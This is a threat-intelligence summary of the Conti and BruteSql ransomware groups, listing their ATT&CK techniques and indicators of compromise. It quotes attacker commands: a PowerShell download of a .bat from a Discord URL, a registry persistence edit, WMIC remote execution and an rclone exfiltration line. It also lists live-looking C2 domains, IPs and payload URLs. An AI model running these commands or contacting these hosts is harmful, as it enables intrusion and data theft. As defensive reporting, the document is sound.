Conti Group, a globally renowned ransomware operation, has recently targeted high-value sectors by exploiting Exchange vulnerabilities to launch targeted campaigns against affluent firms. The report also covers BruteSql Group and links to Conti activity, including Cobalt Strike payloads and remote-control tools like AnyDesk.
#ContiGroup #BruteSqlGroup
#ContiGroup #BruteSqlGroup
Keypoints
- Conti Group has been actively conducting targeted attacks against wealthy industries (risk investment firms, luxury brands, chip manufacturing, foreign joint ventures) using Exchange vulnerabilities.
- Inside Conti Group, the organization reportedly comprises over 400 personnel with specialized roles, indicating a structured operation.
- The group deploys a credential dumper (lsass.dll) to harvest system credentials and dumps memory (MiniDump) for credential access.
- Windows service manipulation and system persistence are used by altering registry entries to point to lsass.dll, enabling backdoor execution.
- Lateral movement and remote control are achieved via WMIC/WinRS and AnyDesk, enabling internal network roaming and remote access.
- Data exfiltration often uses cloud tools like rclone to copy sensitive data out of the network, sometimes via public download/command chains.
- BruteSql Group, a related Russian-speaking actor set, employs SQL brute-forcing and Nday exploits to implant Cobalt Strike backdoors and deploy AnyDesk for remote control, with connections to Conti activity.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Conti Group used an Exchange vulnerability to connect to target machines and establish a tunnel. “Conti Group established a tunnel to target machines via an Exchange vulnerability.”
- [T1003.001] OS Credential Dumping – The lsass.dll dropper steals credentials and stores them to a local file. “The sample’s main function stores system credentials to c:WindowstmpQWER.tmp.”
- [T1543.003] Create or Modify Windows Service – Registry modification to load lsass.dll as a service. “reg.exe add ‘HKLMSYSTEMCurrentControlSetServiceslogincontrollNetworkProvider’ /v ‘ProviderPath’ …”
- [T1059.003] Command-Line – Use of cmd.exe to execute commands during the intrusion. “cmd.exe /c !uplaod D:UchebkaworkSOFTLSASSlsass.dll -dest C:Windowssystem32lsass.dll”
- [T1059.001] PowerShell – PowerShell commands are used to download and execute payloads. “powershell /c powershell.exe Invoke-WebRequest -URI …”
- [T1105] Ingress Tool Transfer – Downloading and executing payloads via Invoke-WebRequest to drop BAT/CS loaders. “powershell.exe Invoke-WebRequest -URI https://cdn.discordapp.com/attachments/943969145555398739/951446861363961866/7.bat -outfile 7.bat”
- [T1047] Windows Management Instrumentation – WMIC command usage to spawn processes on remote hosts. “WMIC process call create “c:programdataAnyDesk.exe –get-id””
- [T1021.001] Remote Services – Use of AnyDesk for remote control to move laterally within networks. “投递Anydesk远程控制程序”
- [T1567.002] Exfiltration to Cloud Storage – Data exfiltration using rclone to cloud storage. “rclone copy –max-age 3y …”
Indicators of Compromise
- [MD5] Conti Group samples – 0838b1a1618c5ea3137ece85f83686c0, c914661e98b35630a9abc356f4b24c58, and 15 more hashes
- [Domain] Command-and-control domains – rewujisaf.com, fuvataren.com, xenilik.com, kusayeyixa.com, wudimomo.com
- [URL] Delivery/loader URLs – https://cdn.discordapp.com/attachments/943969145555398739/951446861363961866/7.bat, https://cdn.discordapp.com/attachments/952197064920555553/952197359423606865/New_Text_Document.bat, http://91.213.50.102:80/avadacedavra
- [IP] Command-and-control/Upload endpoints – 37.252.11.18 (Poland Mega login), 92.255.85.138:8991
- [File Name] Dropped/loaded payloads – lsass.dll, AnyDesk.exe
Read more: https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g